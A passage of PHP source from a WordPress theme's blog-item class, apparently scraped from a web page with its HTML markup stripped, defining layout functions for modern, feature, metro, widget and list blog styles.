'; } if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $blog_thumbnail = $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => $post_format, 'post-format-gallery' => 'slider', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'], 'thumbnail-content' => $this->blog_info(array( 'display' => array('comment-number', 'category'), 'category-background-color' => empty($args['category-background-color'])? '': $args['category-background-color'] )) ), $thumbnail_shadow); $ret .= $blog_thumbnail; if( !empty($blog_thumbnail) && empty($post_format) ){ $args['meta-option'] = array_diff($args['meta-option'], array('comment-number', 'category')); } } if( $args['blog-style'] == 'blog-column-with-frame' ){ $ret .= '
'; }else{ $ret .= '
'; } $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true, 'separator' => '•' )); $ret .= $this->blog_title($args); $ret .= $this->get_blog_excerpt($args); $ret .= '
'; // gdlr-core-blog-grid-content-wrap $ret .= '
'; // gdlr-core-blog-grid return $ret; } // blog modern function blog_modern( $args ){ $feature_image = get_post_thumbnail_id(); $additional_class = empty($feature_image)? ' gdlr-core-no-image': ' gdlr-core-with-image'; if( empty($args['always-show-overlay-content']) || $args['always-show-overlay-content'] == 'disable' ){ $additional_class .= ' gdlr-core-hover-overlay-content'; } if( empty($args['enable-thumbnail-opacity-on-hover']) || $args['enable-thumbnail-opacity-on-hover'] == 'enable' ){ $additional_class .= ' gdlr-core-opacity-on-hover'; } if( empty($args['enable-thumbnail-zoom-on-hover']) || $args['enable-thumbnail-zoom-on-hover'] == 'enable' ){ $additional_class .= ' gdlr-core-zoom-on-hover'; } if( !empty($args['enable-thumbnail-grayscale-effect']) && $args['enable-thumbnail-grayscale-effect'] == 'enable' ){ $additional_class .= ' gdlr-core-grayscale-effect'; } if( !empty($args['blog-image-style']) && $args['blog-image-style'] == 'style-2' ){ $additional_class .= ' gdlr-core-style-2'; } $thumbnail_shadow = array(); if( !empty($feature_image) && !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; $additional_class .= ' gdlr-core-outer-frame-element'; } $ret = '
'; $ret .= '
'; if( !empty($feature_image) ){ $ret .= '
'; $ret .= gdlr_core_get_image($feature_image, $args['thumbnail-size'], array('placeholder' => false)); if( !empty($args['blog-image-style']) && $args['blog-image-style'] == 'style-2' ){ $ret .= $this->blog_info(array( 'display' => array('category'), 'category-background-color' => empty($args['category-background-color'])? '': $args['category-background-color'] )); $args['meta-option'] = array_diff($args['meta-option'], array('category')); } $ret .= '
'; } if( !empty($args['blog-image-thumbnail-overlay']) ){ if( $args['blog-image-thumbnail-overlay'] == 'gradient' ){ $ret .= '
'; }else if( $args['blog-image-thumbnail-overlay'] == 'gradient2' ){ $ret .= '
'; }else if( $args['blog-image-thumbnail-overlay'] == 'opacity' ){ $ret .= '
(empty($args['blog-image-thumbnail-overlay-opacity']) || $args['blog-image-thumbnail-overlay-opacity'] == '0.4')? '': $args['blog-image-thumbnail-overlay-opacity'] )) . ' >
'; } } $ret .= '
empty($args['blog-image-overlay-content-padding'])? '': $args['blog-image-overlay-content-padding'] )) . '>'; $ret .= $this->blog_title($args); $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true )); if( !empty($args['blog-image-excerpt-number']) ){ $args['excerpt'] = 'specify-number'; $args['excerpt-number'] = $args['blog-image-excerpt-number']; $ret .= $this->get_blog_excerpt($args); } $ret .= '
'; // gdlr-core-blog-modern-content $ret .= '
'; // gdlr-core-blog-modern-inner $ret .= '
'; // gdlr-core-blog-modern return $ret; } // blog feature function blog_feature( $args ){ $feature_image = get_post_thumbnail_id(); $additional_class = empty($feature_image)? ' gdlr-core-no-image': ' gdlr-core-with-image'; if( empty($args['blog-feature-main']) ){ $additional_class .= ' gdlr-core-sub-item'; unset($args['blog-title-font-size']); }else{ $additional_class .= ' gdlr-core-main-item'; } if( empty($args['always-show-overlay-content']) || $args['always-show-overlay-content'] == 'disable' ){ $additional_class .= ' gdlr-core-hover-overlay-content'; } if( empty($args['enable-thumbnail-opacity-on-hover']) || $args['enable-thumbnail-opacity-on-hover'] == 'enable' ){ $additional_class .= ' gdlr-core-opacity-on-hover'; } if( empty($args['enable-thumbnail-zoom-on-hover']) || $args['enable-thumbnail-zoom-on-hover'] == 'enable' ){ $additional_class .= ' gdlr-core-zoom-on-hover'; } if( !empty($args['enable-thumbnail-grayscale-effect']) && $args['enable-thumbnail-grayscale-effect'] == 'enable' ){ $additional_class .= ' gdlr-core-grayscale-effect'; } $ret = '
'; $ret .= '
'; if( !empty($feature_image) ){ $ret .= '
'; $ret .= gdlr_core_get_image($feature_image, $args['thumbnail-size'], array('placeholder' => false)); $ret .= '
'; } if( !empty($args['blog-image-thumbnail-overlay']) ){ if( $args['blog-image-thumbnail-overlay'] == 'gradient' ){ $ret .= '
'; }else if( $args['blog-image-thumbnail-overlay'] == 'gradient2' ){ $ret .= '
'; }else if( $args['blog-image-thumbnail-overlay'] == 'opacity' ){ $ret .= '
(empty($args['blog-image-thumbnail-overlay-opacity']) || $args['blog-image-thumbnail-overlay-opacity'] == '0.4')? '': $args['blog-image-thumbnail-overlay-opacity'] )) . ' >
'; } } if( in_array('category', $args['meta-option']) ){ $ret .= $this->blog_info(array( 'display' => array('category'), 'category-background-color' => empty($args['category-background-color'])? '': $args['category-background-color'] )); $args['meta-option'] = array_diff($args['meta-option'], array('category')); } $ret .= '
'; $ret .= $this->blog_title($args); $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true )); $ret .= '
'; // gdlr-core-blog-modern-content $ret .= '
'; // gdlr-core-blog-modern-inner $ret .= '
'; // gdlr-core-blog-modern return $ret; } // blog metro function blog_metro( $args ){ $feature_image = get_post_thumbnail_id(); $additional_class = empty($feature_image)? ' gdlr-core-no-image': ' gdlr-core-with-image'; if( empty($args['enable-thumbnail-opacity-on-hover']) || $args['enable-thumbnail-opacity-on-hover'] == 'enable' ){ $additional_class .= ' gdlr-core-opacity-on-hover'; } if( empty($args['enable-thumbnail-zoom-on-hover']) || $args['enable-thumbnail-zoom-on-hover'] == 'enable' ){ $additional_class .= ' gdlr-core-zoom-on-hover'; } if( !empty($args['enable-thumbnail-grayscale-effect']) && $args['enable-thumbnail-grayscale-effect'] == 'enable' ){ $additional_class .= ' gdlr-core-grayscale-effect'; } $thumbnail_shadow = array(); if( !empty($feature_image) && !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } $ret = '
'; $ret .= '
'; if( !empty($feature_image) ){ $ret .= '
'; $ret .= gdlr_core_get_image($feature_image, $args['thumbnail-size'], array('placeholder' => false)); $ret .= '
'; } $ret .= '
'; $ret .= $this->blog_title($args); $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true )); $ret .= '
'; // gdlr-core-blog-metro-content $ret .= '
'; // gdlr-core-blog-metro-inner $ret .= '
'; // gdlr-core-blog-metro return $ret; } // blog list function blog_widget( $args ){ $additional_class = empty($args['text-align'])? '': ' gdlr-core-' . $args['text-align'] . '-align'; $additional_class .= empty($args['item-size'])? '': 'gdlr-core-style-' . $args['item-size']; $ret = '
empty($args['margin-bottom'])? '': $args['margin-bottom'] )) . ' >'; if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $ret .= $this->blog_thumbnail(array( 'thumbnail-size' => 'thumbnail', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'] )); } $ret .= '
'; $ret .= $this->blog_title($args); $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true )); $ret .= '
'; // gdlr-core-blog-widget-content $ret .= '
'; // gdlr-core-blog-widget return $ret; } // blog list function blog_list( $args ){ $with_frame = ( !empty($args['blog-list-with-frame']) && $args['blog-list-with-frame'] == 'enable' ); $additional_class = ($args['blog-style'] == 'blog-list-center')? ' gdlr-core-center-align': ''; $additional_class .= ($with_frame)? ' gdlr-core-blog-list-with-frame': ''; $ret = '
empty($args['margin-bottom'])? '': $args['margin-bottom'] )) . ' >'; $ret .= $with_frame? '
': ''; $ret .= $this->blog_title($args); $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true, 'icon' => false, 'separator' => '/' )); $ret .= $with_frame? '
': ''; $ret .= '
'; // gdlr-core-blog-list return $ret; } } // gdlr_core_blog_item } // class_exists Page not found - My WordPress Website